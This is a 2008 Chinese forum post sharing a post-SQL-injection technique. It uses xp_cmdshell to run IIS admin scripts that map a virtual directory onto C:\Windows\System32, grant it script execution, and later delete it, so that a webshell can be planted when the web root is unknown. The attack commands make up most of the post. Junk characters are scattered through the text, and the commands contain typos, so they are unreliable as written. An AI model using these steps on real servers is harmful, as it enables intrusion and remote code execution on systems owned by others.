|
- 帖子
- 120
- 积分
- 470
- 威望
- 636
- 金钱
- 101
- 在线时间
- 31 小时
   
|
很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:
6 w1 i9 L- y+ k- N: ?
5 m3 K# A5 x7 X9 `exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'
% Z) w+ S: x5 L6 j( [7 Q5 ^建立虚拟目录win,指向c:\windows\system32
$ `, p9 S( a! m' a0 k/ Aexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'6 V5 ~7 c8 b0 C5 A2 T4 O! n+ v& S9 i4 f
让win句有解析asp脚本权限$ k% ?) \% k) B( E5 Y
3 G5 u" X) J9 A
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/": r9 R: g, S! `" I+ }9 [1 Q3 i9 N% N
删除虚拟目录。
! L% K( d6 p: X1 j7 `3 W, v. `$ E# \找不到web绝对路径的一种解决办法,; n7 S* h. a: q
0 h3 y+ \: e1 p3 Q& P403错误,表示虚拟目录建好了。。 |
-
1
评分人数
-
|
发表于 2008-10-22 14:38
| 
